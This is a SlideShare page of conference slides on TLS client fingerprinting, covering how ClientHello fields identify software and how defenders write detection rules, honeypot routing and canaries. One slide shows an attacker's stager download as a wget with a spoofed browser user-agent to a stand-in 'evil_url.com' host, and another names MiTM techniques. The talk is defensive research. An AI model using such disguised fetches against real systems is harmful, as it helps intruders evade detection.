Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Stealthier Attacks &
Smarter Defending
with TLS Fingerprinting
Lee Brotherston
@synackpse #TLSFP
… A “Zero Math,
(almost) Zero Crypto”,
TLS Talk
Lee Brotherston
@synackpse #TLSFP
TLS PRIMER….. (Shhhh…. it’s not a cryptographic
algorithm)
Client
Kittens……..
Unicorn Tears
Pixie Dust
TCP: SYN
Server
TCP: SYN/ACK
TCP: ACK
Client Hello
ServerClient
Server Hello
Client Key Exchange
Change Cipher Spec
Change Cipher Spec
Encrypted Data
Fingerprints
Why
Clients?
SSLCipherSuite RC4-SHA:AES128-SHA:HIGH:!aNULL:!MD5
SSLHonorCipherOrder on
smtpd_tls_mandatory_ciphers = high
smtpd_tls_man...
Origin Story
Expanding…
Content Type Version Length
Handshake Type Length Version
Random
Session ID
Length
Session ID
Cipher Suites
Length
Cipher ...
Content Type Version Length
Handshake Type Length Version
Random
Session ID
Length
Session ID
Cipher Suites
Length
Cipher ...
Extensions
Significant,
key - value
order is!
Creating a
FingerPrint
{
"id": 0,
"desc": "Dropbox (Win 8.1)”,
"record_tls_version": “0x0301",
"tls_version": “0x0301",
"ciphersuite_length": “0x...
Deobfuscation
ssh -p443 user@myhost
(don’t pretend you don’t)
Any Port ✓
Stateless ✓
Asymmetric ✓
Low Cost ✓
tcp[tcp[12]/16*4]=22
and (tcp[tcp[12]/16*4+5]=1)
and ((tcp[tcp[12]/16*4+9]=3)
or (tcp[tcp[12]/16*4+9]=0))
and ((tcp[tcp[12...
tcp[tcp[12]/16*4]=22
and (tcp[tcp[12]/16*4+5]=1)
and (tcp[tcp[12]/16*4+9]=3)
and (tcp[tcp[12]/16*4+1]=3)
Storage &
Retention
Client to
Server
Server to
Client
Discarded
Unfiltered 9547378 3776313 99.226%
Handshake &
Client Hello Filter 51766 59 2.8...
Moving on…..
Own Fingerprint
Modification
Collisions?
Car & Photo: @snipeyhead
Yes… ok no….
sort of….. a bit….
occasionally
Attacker Level 1:
Stealth MiTM
ARP Cache PoisoningDNSSpoofing
BGP Hijacking
Hacked Proxy
Malicious Tor Node
LocalAgent
MaliciousProvider
Rogue DHCP
TLS Attacks
Real
Server
Client
Evil
Server
TCP: SYN
TCP: SYN/ACK
TCP: ACK
Client Hello
Hacker
Attacker Level 2:
AntiForensics
Enumerated Targets ✓
Prepared Exploits ✓
Delivered Stager/Phish ✓
Awaiting Callback …
Meanwhile…
wget --user-agent="Mozilla/4.0
(Windows; MSIE 7.0; Windows NT 5.1;
SV1; .NET CLR 2.0.50727)"
https://evil_url.c...
“Legit”
Server
Client
Attack
Server
TCP: SYN
TCP: SYN/ACK
TCP: ACK
Client Hello
IE7
wget
Hacker
Defender Level 1:
Detection
SRC DEST
192.168.1.37:3847 66.185.84.30:443
192.168.1.37:44870 74.125.226.150:443
192.168.1.49:36469 38.229.70.22:6667
192...
$ sudo tcpdump -Xni eth0 host desktop
16:29:39.149010 IP 10.54.103.76.3010 > 54.204.30.201.443: Flags [P.], seq
826:991, a...
Probably Browsing
¯_(ツ)_/¯
Attributon: Alex Pinto
MLSec
SRC DEST
192.168.1.37:3847 66.185.84.30:443
192.168.1.37:44870 74.125.226.150:443
192.168.1.49:36469 38.229.70.22:6667
192...
SRC DEST
192.168.1.37:3847 www.google.com:443
192.168.1.37:44870 Unknown:443
192.168.1.49:36469 FreeNode IRC:6667
192.168....
SRC DEST
192.168.1.37:3847 www.google.com:443
192.168.1.37:44870 Unknown:443
192.168.1.49:36469 FreeNode IRC:6667
192.168....
“Anomaly
Detection”
Not Just
Hax0ring
Defender Level 2:
Fingerprint
Defined Routing
Real
Server
Client Defence
Honey
Pot
TCP: SYN
TCP: SYN/ACK
TCP: ACK
Client Hello
Defender Level 3:
Fingerprint
Canaries
Homogeneous
Platforms
End Of Level Boss:
Nation State
Attackers (zomg!)
Honorable
Mention:
HoneyPots
Tools
FingerprinTLS$ sudo ./ssl_fingerprint/fingerprintls/fingerprintls -i en0 -s
Password:
Using interface: en0
Fingerprint Mat...
{
0, "Shodan", 0x0301, 0x0302, 0x0010,
{0x00,0x14,0x00,0x11,0x00,0x19,0x00,0x08,
0x00,0x06,0x00,0x17,0x00,0x03,0x00,0xFF},...
alert tcp any any -> any any ( msg:"ruby script (tested: 2.0.0p481)";
content: "|16 03 01|"; offset: 0; depth: 3; rawbytes...
$ ./parse_fingerprint.py ../json/combined.json xkeyscore
# Rule for "Mozilla/4.0 (compatible; MSIE 6.0 or MSIE 7.0)"
“x16x...
$ ./parse_fingerprint.py ./combined.json cleanse | grep '#'
# Oh no, 2 signatures match: Java (tested: v8 Update 60) - Arc...
(╯°□°)╯︵ ┻━┻
{"id": 0, "desc": "MS Word / MS WebDav", "record_tls_version": " 0x0301", "tls_version": "0x0301 ", "ciphersuite_length": ...
Demo?
Vorführeffekt?
What’s Next?
https://github.com/LeeBrotherston/tls-fingerprinting
http://www.slideshare.net/leebrotherston
@synackpse @FingerprinTLS #T...
Random
Observations
Thank you!
Lee Brotherston
@synackpse #TLSFP
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
TLS Fingerprinting SecTorCA Edition
Upcoming SlideShare
Loading in …5
×

TLS Fingerprinting SecTorCA Edition

1,272 views

Published on

The slides to accompany my SecTorCA talk on TLS Fingerprinting (Stealthier Attacks & Smarter Defending)

Published in: Technology
  • TLS Fingerprinting is brilliant ! TLS certificates are the best trust anchors we have but we can't afford to blindly trust them. Know what certificates are on your network where !
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

TLS Fingerprinting SecTorCA Edition

  1. 1. Stealthier Attacks & Smarter Defending with TLS Fingerprinting Lee Brotherston @synackpse #TLSFP
  2. 2. … A “Zero Math, (almost) Zero Crypto”, TLS Talk Lee Brotherston @synackpse #TLSFP
  3. 3. TLS PRIMER….. (Shhhh…. it’s not a cryptographic algorithm)
  4. 4. Client Kittens…….. Unicorn Tears Pixie Dust TCP: SYN Server TCP: SYN/ACK TCP: ACK
  5. 5. Client Hello ServerClient Server Hello Client Key Exchange Change Cipher Spec Change Cipher Spec Encrypted Data
  6. 6. Fingerprints
  7. 7. Why Clients?
  8. 8. SSLCipherSuite RC4-SHA:AES128-SHA:HIGH:!aNULL:!MD5 SSLHonorCipherOrder on smtpd_tls_mandatory_ciphers = high smtpd_tls_mandatory_exclude_ciphers = aNULL, MD5 smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3 smtpd_tls_mandatory_protocols = TLSv1 ssl_cipher_list = ALL:!LOW:!SSLv2:!EXP:!aNULL
  9. 9. Origin Story
  10. 10. Expanding…
  11. 11. Content Type Version Length Handshake Type Length Version Random Session ID Length Session ID Cipher Suites Length Cipher Suites Compression Methods Length Compression Methods Extensions
  12. 12. Content Type Version Length Handshake Type Length Version Random Session ID Length Session ID Cipher Suites Length Cipher Suites Compression Methods Length Compression Methods Extensions
  13. 13. Extensions
  14. 14. Significant, key - value order is!
  15. 15. Creating a FingerPrint
  16. 16. { "id": 0, "desc": "Dropbox (Win 8.1)”, "record_tls_version": “0x0301", "tls_version": “0x0301", "ciphersuite_length": “0x0010", "ciphersuite": "0xC014 0xC013 0xC011 0x0039 0x0033 0x0035 0x002F 0x00FF", "compression_length": “1", "compression": “0x00", "extensions": "0x0000 0x0023”, "server_name": “client-lb.dropbox.com" }
  17. 17. Deobfuscation
  18. 18. ssh -p443 user@myhost (don’t pretend you don’t)
  19. 19. Any Port ✓ Stateless ✓ Asymmetric ✓ Low Cost ✓
  20. 20. tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1) and ((tcp[tcp[12]/16*4+9]=3) or (tcp[tcp[12]/16*4+9]=0)) and ((tcp[tcp[12]/16*4+1]=3) or (tcp[tcp[12]/16*4+1]=0))
  21. 21. tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1) and (tcp[tcp[12]/16*4+9]=3) and (tcp[tcp[12]/16*4+1]=3)
  22. 22. Storage & Retention
  23. 23. Client to Server Server to Client Discarded Unfiltered 9547378 3776313 99.226% Handshake & Client Hello Filter 51766 59 2.859% 1st Byte TLS Version 51677 3 0.005% 1st Byte TLS Version (Record) 51677 0 0.000%
  24. 24. Moving on…..
  25. 25. Own Fingerprint Modification
  26. 26. Collisions? Car & Photo: @snipeyhead
  27. 27. Yes… ok no…. sort of….. a bit…. occasionally
  28. 28. Attacker Level 1: Stealth MiTM
  29. 29. ARP Cache PoisoningDNSSpoofing BGP Hijacking Hacked Proxy Malicious Tor Node LocalAgent MaliciousProvider Rogue DHCP
  30. 30. TLS Attacks
  31. 31. Real Server Client Evil Server TCP: SYN TCP: SYN/ACK TCP: ACK Client Hello Hacker
  32. 32. Attacker Level 2: AntiForensics
  33. 33. Enumerated Targets ✓ Prepared Exploits ✓ Delivered Stager/Phish ✓ Awaiting Callback …
  34. 34. Meanwhile… wget --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" https://evil_url.com/thing/
  35. 35. “Legit” Server Client Attack Server TCP: SYN TCP: SYN/ACK TCP: ACK Client Hello IE7 wget Hacker
  36. 36. Defender Level 1: Detection
  37. 37. SRC DEST 192.168.1.37:3847 66.185.84.30:443 192.168.1.37:44870 74.125.226.150:443 192.168.1.49:36469 38.229.70.22:6667 192.168.1.122:51593 54.204.30.235:22 10.54.107.19:64926 194.54.103.65:22 10.54.103.99:3010 54.204.30.201:443 10.54.103.76:3013 64.136.25.171:80 10.54.103.66:3847 192.168.10.64:25 10.54.103.33:3009 54.204.30.11:443 10.54.103.99:3010 192.168.10.10:443
  38. 38. $ sudo tcpdump -Xni eth0 host desktop 16:29:39.149010 IP 10.54.103.76.3010 > 54.204.30.201.443: Flags [P.], seq 826:991, ack 990, win 64, options [nop,nop,TS val 1123747053 ecr 530699601], length 165 0x0000: 4500 00d9 62a9 4000 3306 586b 36af 939e E...b.@.3.Xk6... 0x0010: c0a8 0115 01bb c04d 49e3 2eec fb96 5e29 .......MI.....^) 0x0020: 8018 0040 ff69 0000 0101 080a 42fb 04ed ...@.i......B... 0x0030: 1fa1 d551 1703 0300 a008 7a4c d2cf 56e3 ...Q......zL..V. 0x0040: b83a b448 3e23 accd 3495 a547 202a e88a .:.H>#..4..G.*.. 0x0050: f05d 9f25 121a 9e1e 4944 4431 f493 0b4d .].%....IDD1...M 0x0060: e5fc c83c a77c 0cf6 6adb 96d6 7b05 481d ...<.|..j...{.H. 0x0070: 84d8 9049 952d d524 6643 00aa ccc7 48d1 ...I.-.$fC....H. 0x0080: 31d4 d033 d523 39e7 dbcd 5b8f 2204 da9d 1..3.#9...[."... 0x0090: 66fb ee3d b9c3 2bb2 5649 bdac 240d 4942 f..=..+.VI..$.IB 0x00a0: f588 e44a 44da 64cd f35c a73b 1bdf d9ac ...JD.d...;.... 0x00b0: 1bad dfc1 4c75 253d dcf0 42f9 452b 1fea ....Lu%=..B.E+.. 0x00c0: d5d9 384b 9d63 804e ccfb 2f08 8404 035d ..8K.c.N../....] 0x00d0: 269b 0a99 7801 970c 9a &...x....
  39. 39. Probably Browsing ¯_(ツ)_/¯
  40. 40. Attributon: Alex Pinto MLSec
  41. 41. SRC DEST 192.168.1.37:3847 66.185.84.30:443 192.168.1.37:44870 74.125.226.150:443 192.168.1.49:36469 38.229.70.22:6667 192.168.1.122:51593 54.204.30.235:22 10.54.107.19:64926 194.54.103.65:22 10.54.103.99:3010 54.204.30.201:443 10.54.103.76:3013 64.136.25.171:80 10.54.103.66:3847 192.168.10.64:25 10.54.103.33:3009 54.204.30.11:443 10.54.103.99:3010 192.168.10.10:443
  42. 42. SRC DEST 192.168.1.37:3847 www.google.com:443 192.168.1.37:44870 Unknown:443 192.168.1.49:36469 FreeNode IRC:6667 192.168.1.122:51593 AWS Something:22 10.54.107.19:64926 Unknown:22 10.54.103.99:3010 AWS Something:443 10.54.103.76:3013 Unknown:80 10.54.103.66:3847 Internal SMTP:25 10.54.103.33:3009 AWS Something:443 10.54.103.99:3010 Sharepoint:443
  43. 43. SRC DEST 192.168.1.37:3847 www.google.com:443 192.168.1.37:44870 Unknown:443 192.168.1.49:36469 FreeNode IRC:6667 192.168.1.122:51593 AWS Something:22 10.54.107.19:64926 Unknown:22 10.54.103.99:3010 AWS Something:443 10.54.103.76:3013 Unknown:80 10.54.103.66:3847 Internal SMTP:25 10.54.103.33:3009 AWS Something:443 10.54.103.99:3010 Sharepoint:443mitmproxy Tor
  44. 44. “Anomaly Detection”
  45. 45. Not Just Hax0ring
  46. 46. Defender Level 2: Fingerprint Defined Routing
  47. 47. Real Server Client Defence Honey Pot TCP: SYN TCP: SYN/ACK TCP: ACK Client Hello
  48. 48. Defender Level 3: Fingerprint Canaries
  49. 49. Homogeneous Platforms
  50. 50. End Of Level Boss: Nation State Attackers (zomg!)
  51. 51. Honorable Mention: HoneyPots
  52. 52. Tools
  53. 53. FingerprinTLS$ sudo ./ssl_fingerprint/fingerprintls/fingerprintls -i en0 -s Password: Using interface: en0 Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56274 to 104.244.43.39:443 Servername: "pbs.twimg.com" Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56281 to 167.114.152.100:443 Servername: "www.i6l66pzauglk2kqx2b.com" Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56280 to 37.221.162.226:9001 Servername: “www.jy27vswlheykb2dptady.com" Fingerprint Matched: "mutt (tested: 1.5.23 - OS X)" TLSv1.2 connection from 192.168.1.5:56316 to 74.125.69.108:993 Servername: "Not Set” Fingerprint Matched: "ThunderBird (v38.0.1 OS X)" TLSv1.2 connection from 192.168.1.5:56394 to 74.125.69.108:993 Servername: “imap.gmail.com” Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56233 to 104.244.43.199:443 Servername: "pbs.twimg.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56236 to 23.195.217.14:443 Servername: "s.mzstatic.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56242 to 184.25.66.217:443 Servername: "itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56243 to 23.195.218.30:443 Servername: "su.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56246 to 23.21.97.18:443 Servername: "vine.co" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56247 to 184.25.66.217:443 Servername: "init.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56248 to 104.244.43.229:443 Servername: "v.cdn.vine.co" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56250 to 17.173.66.136:443 Servername: "xp.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56253 to 23.195.217.14:443 Servername: "s.mzstatic.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56259 to 23.195.218.30:443 Servername: "se.itunes.apple.com" Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56267 to 104.244.43.167:443 Servername: "pbs.twimg.com" Fingerprint Matched: "AppleWebKit/600.7.12 or 600.1.4" TLSv1.2 connection from 192.168.1.5:56273 to 104.244.43.7:443 Servername: "pbs.twimg.com"
  54. 54. { 0, "Shodan", 0x0301, 0x0302, 0x0010, {0x00,0x14,0x00,0x11,0x00,0x19,0x00,0x08, 0x00,0x06,0x00,0x17,0x00,0x03,0x00,0xFF}, 1, {0x00}, 4, {0x00,0x23,0x00,0x0F} , 0 , {} , 0 , {} , 0 , {} } Fingerprintout
  55. 55. alert tcp any any -> any any ( msg:"ruby script (tested: 2.0.0p481)"; content: "|16 03 01|"; offset: 0; depth: 3; rawbytes; content: "| 01|"; distance: 1; rawbytes; content: "|03 01|"; distance: 3; rawbytes; byte_jump: 1,43,align; content: "|00 24|"; distance: 0; rawbytes; content: "|00 39 00 38 00 35 00 33 00 32 00 2F 00 16 00 13 00 0A 00 9A 00 99 00 96 00 05 00 04 00 15 00 12 00 09 00 FF|"; distance: 0; rawbytes; content: "|01 00|"; distance: 0; rawbytes; content: "|00 00|"; rawbytes; distance: 2; byte_jump: 2,0,relative; content: "|00 23|"; rawbytes; distance: 0; sid:1000169; rev:1;) Fingerprintout
  56. 56. $ ./parse_fingerprint.py ../json/combined.json xkeyscore # Rule for "Mozilla/4.0 (compatible; MSIE 6.0 or MSIE 7.0)" “x16x03x01.*x01.*x03x01.* x00x16x00x04x00x05x00x0x00x09x00x64x00x62x00 x03x00x06x00x13x00x12x00x63.*x00" Fingerprintout
  57. 57. $ ./parse_fingerprint.py ./combined.json cleanse | grep '#' # Oh no, 2 signatures match: Java (tested: v8 Update 60) - Archive.org bot # Oh no, 2 signatures match: Archive.org bot - Java (tested: v8 Update 60) Fingerprintout
  58. 58. (╯°□°)╯︵ ┻━┻
  59. 59. {"id": 0, "desc": "MS Word / MS WebDav", "record_tls_version": " 0x0301", "tls_version": "0x0301 ", "ciphersuite_length": "0x0014 ", "ciphersuite": "0xC014 0xC013 0xC00A 0xC009 0x0035 0x002F 0x0038 0x0032 0x000A 0x0013", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x000A 0x000B 0xFF01", "e_curves": " 0x0019 0x0017 0x0018 ", "sig_alg": " ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "Internet Explorer 11.0.9600.17959", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0030 ", "ciphersuite": "0xC028 0xC027 0xC014 0xC013 0x009F 0x009E 0x009D 0x009C 0xC02C 0xC02B 0xC024 0xC023 0xC00A 0xC009 0x003D 0x003C 0x0035 0x002F 0x006A 0x0040 0x0038 0x0032 0x000A 0x0013", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x0005 0x000A 0x000B 0x000D 0xFF01", "e_curves": " 0x0017 0x0018 0x0019 ", "sig_alg": " 0x0601 0x0603 0x0401 0x0501 0x0201 0x0403 0x0503 0x0203 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "Pidgin (tested 2.10.11)", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x0022 ", "ciphersuite": "0xC02B 0xC02F 0xC00A 0xC009 0xC013 0xC027 0xC014 0xC007 0xC011 0x009E 0x0033 0x0032 0x0067 0x0039 0x006B 0x002F 0x0035", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0xFF01 0x000A 0x000B 0x000D", "e_curves": " 0x0017 0x0018 0x0019 ", "sig_alg": " 0x0401 0x0501 0x0201 0x0403 0x0503 0x0203 0x0402 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "Windows Java Plugin (tested: v8 Update 60)", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x003A ", "ciphersuite": "0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02B 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "Windows 8.x Apps Store thing (unconfirmed)", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0034 ", "ciphersuite": "0xC028 0xC027 0xC014 0xC013 0x009F 0x009E 0x009D 0x009C 0x003D 0x003C 0x0035 0x002F 0xC02C 0xC02B 0xC024 0xC023 0xC00A 0xC009 0x006A 0x0040 0x0038 0x0032 0x000A 0x0013 0x0005 0x0004", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x000A 0x000B 0x000D 0x0023 0xFF01", "e_curves": " 0x0017 0x0018 ", "sig_alg": " 0x0401 0x0501 0x0601 0x0201 0x0403 0x0503 0x0603 0x0203 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "w3c HTML Validator", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x00AE ", "ciphersuite": "0xC030 0xC02C 0xC028 0xC024 0xC014 0xC00A 0x00A3 0x009F 0x006B 0x006A 0x0039 0x0038 0x0088 0x0087 0xC019 0x00A7 0x006D 0x003A 0x0089 0xC032 0xC02E 0xC02A 0xC026 0xC00F 0xC005 0x009D 0x003D 0x0035 0x0084 0xC012 0xC008 0x0016 0x0013 0xC017 0x001B 0xC00D 0xC003 0x000A 0xC02F 0xC02B 0xC027 0xC023 0xC013 0xC009 0x00A2 0x009E 0x0067 0x0040 0x0033 0x0032 0x009A 0x0099 0x0045 0x0044 0xC018 0x00A6 0x006C 0x0034 0x009B 0x0046 0xC031 0xC02D 0xC029 0xC025 0xC00E 0xC004 0x009C 0x003C 0x002F 0x0096 0x0041 0xC011 0xC007 0xC016 0x0018 0xC00C 0xC002 0x0005 0x0004 0x0014 0x0011 0x0019 0x0008 0x0006 0x0017 0x0003 0x00FF", "compression_length": "2 ", "compression": "0x01 0x00", "extensions": "0x0000 0x000B 0x000A 0x0023 0x000D 0x000F", "e_curves": " 0x000E 0x000D 0x0019 0x000B 0x000C 0x0018 0x0009 0x000A 0x0016 0x0017 0x0008 0x0006 0x0007 0x0014 0x0015 0x0004 0x0005 0x0012 0x0013 0x0001 0x0002 0x0003 0x000F 0x0010 0x0011 ", "sig_alg": " 0x0601 0x0602 0x0603 0x0501 0x0502 0x0503 0x0401 0x0402 0x0403 0x0301 0x0302 0x0303 0x0201 0x0202 0x0203 0x0101 ", "ec_point_fmt": " 0x00 0x01 0x02 ", "server": "" } {"id": 0, "desc": "w3c HTML Validator", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0064 ", "ciphersuite": "0xC024 0xC028 0x003D 0xC026 0xC02A 0x006B 0x006A 0xC00A 0xC014 0x0035 0xC005 0xC00F 0x0039 0x0038 0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02C 0xC02B 0xC030 0x009D 0xC02E 0xC032 0x009F 0x00A3 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "Archive.org bot", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x003A ", "ciphersuite": "0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02B 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" } {"id": 0, "desc": "OpenSSL s-client with -tls1 flag", "record_tls_version": " 0x0301", "tls_version": "0x0301 ", "ciphersuite_length": "0x002E ", "ciphersuite": "0x0039 0x0038 0x0035 0x0016 0x0013 0x000A 0x0033 0x0032 0x002F 0x009A 0x0099 0x0096 0x0005 0x0004 0x0015 0x0012 0x0009 0x0014 0x0011 0x0008 0x0006 0x0003 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0023", "e_curves": " ", "sig_alg": " ", "ec_point_fmt": " ", "server": "" } {"id": 0, "desc": "GNUTLS Commandline", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x0084 ", "ciphersuite": "0xC02B 0xC02C 0xC086 0xC087 0xC009 0xC023 0xC00A 0xC024 0xC072 0xC073 0xC008 0xC007 0xC02F 0xC030 0xC08A 0xC08B 0xC013 0xC027 0xC014 0xC028 0xC076 0xC077 0xC012 0xC011 0x009C 0x009D 0xC07A 0xC07B 0x002F 0x003C 0x0035 0x003D 0x0041 0x00BA 0x0084 0x00C0 0x000A 0x0005 0x0004 0x009E 0x009F 0xC07C 0xC07D 0x0033 0x0067 0x0039 0x006B 0x0045 0x00BE 0x0088 0x00C4 0x0016 0x00A2 0x00A3 0xC080 0xC081 0x0032 0x0040 0x0038 0x006A 0x0044 0x00BD 0x0087 0x00C3 0x0013 0x0066", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0005 0x0000 0xFF01 0x0023 0x000A 0x000B 0x000D", "e_curves": " 0x0017 0x0018 0x0019 0x0015 0x0013 ", "sig_alg": " 0x0401 0x0402 0x0403 0x0501 0x0503 0x0601 0x0603 0x0301 0x0302 0x0303 0x0201 FingerPrint DB
  60. 60. Demo?
  61. 61. Vorführeffekt?
  62. 62. What’s Next?
  63. 63. https://github.com/LeeBrotherston/tls-fingerprinting http://www.slideshare.net/leebrotherston @synackpse @FingerprinTLS #TLSFP 📖 https://blog.squarelemon.com/tls-fingerprinting/
  64. 64. Random Observations
  65. 65. Thank you! Lee Brotherston @synackpse #TLSFP

×